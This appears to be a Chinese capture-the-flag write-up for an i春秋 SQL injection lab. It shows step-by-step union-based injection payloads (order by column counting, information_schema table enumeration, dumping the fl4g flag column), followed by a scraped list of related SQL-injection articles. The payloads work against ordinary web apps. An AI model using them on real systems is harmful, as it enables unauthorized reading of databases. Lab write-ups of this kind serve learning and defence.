i春秋之SQL注入-1

注入点判断

字段判断

爆表

注入点判断

不难发现修改GET传参中id的值页面就不一样，而且当id=1' and 1=2时页面不正常

所以id就是注入点

字段判断

构建payload

inurl?id=1' order by x --+

当x=4的时候页面不正常，说明字段数为3，而且当id=4的时候页面也不正常

接着用联合注入，构建payload

inurl?id=-1' union select 1,2,3 --+

可以看到2和3的位置有回显

爆表

看一下当前数据库里的所有表名，构建payload

inurl?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database() --+

可以看到有两表，接着看一下fl4g这个表里的字段有啥，构建payload

好了，知道字段名跟表名，我们来看一下字段里有啥，构建payload

inurl?id=-1' union select 1,2,group_concat(fllllag) from fl4g --+

拿到flag

i春秋之SQL注入-1相关推荐

【sql注入教程】SQL注入是什么？我们如何去玩转它
[sql注入教程]SQL注入是什么?我们如何去玩转它本文转自:i春秋社区 SQL注入攻击是黑客攻击数据库最常见手段之一.简单讲,SQL注入攻击是黑客利用网站程序漏洞,通过提交精心构造的SQL语句 ...
i春秋2020新春公益赛 GYCTF有关SQL注入题复现
0x00 前言最近这段时间参加过一些CTF在线竞赛,做过一些Web题,发现SQL注入漏洞出现的频率可真高!不过在做题中也get到了一些Web新知识,现在通过题目复现的方式总结一下. 0x01 bla ...
第一次CTF【后台登录、简单的sql注入之、简单的sql注入之2、猫抓老鼠、i春秋文件上传】
后台登录 http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 根据md5($password,true)最后要得到原始二进制字符串,要含有or ,在or ...
[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag
CVE-2022-28060 访问题目提示的login.php,登录框登录抓包,保存为2.txt,sqlmap跑起来 python3 sqlmap.py -r 2.txt --file-read &q ...
[网络安全提高篇] 一〇五.SQL注入之揭秘Oracle数据库注入漏洞和致命问题（联合Cream老师）
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
【SQL注入】CTF练习题WriteUp——“百度杯”CTF比赛九月场SQL
目录 1 前言 2 解题步骤 2.1 审题 2.2 判断注入数据类型及闭合方式 2.3 尝试联合查询注入 2.3.1 测试回显列数 2.3.2 测试显示位 2.3.3 爆库 3 总结 1 前言本节内 ...
关于SQL注入，绕过逗号过滤
关于SQL注入,绕过逗号过滤前言题目测试解题 1.union联合注入 2.盲注总结前言最近在i春秋遇到一道sqli题目,觉得很有意思,总结一下与大家分享. "百度杯" ...
Python 网络爬虫2：第三方库requests 渗透脚本的编写（SQL注入的EXP，主机发现、端口扫描）
文章目录 Python 编写EXP requests库的使用 http方法发送http请求定制头部超时 GET传参 POST传参上传文件 COOKIE 使用爬虫爬取网页中所有课程的名字使用p ...
php mysql 防 sql注入_php 防sql注入方法
php防sql注入的方法:1.使用mysql_real_escape_string方法转义SQL语句中使用的字符串中的特殊字符:2.打开magic_quotes_gpc来防止SQL注入:3.通过自定义 ...

i春秋之SQL注入-1

注入点判断

字段判断

爆表

i春秋之SQL注入-1相关推荐

最新文章

热门文章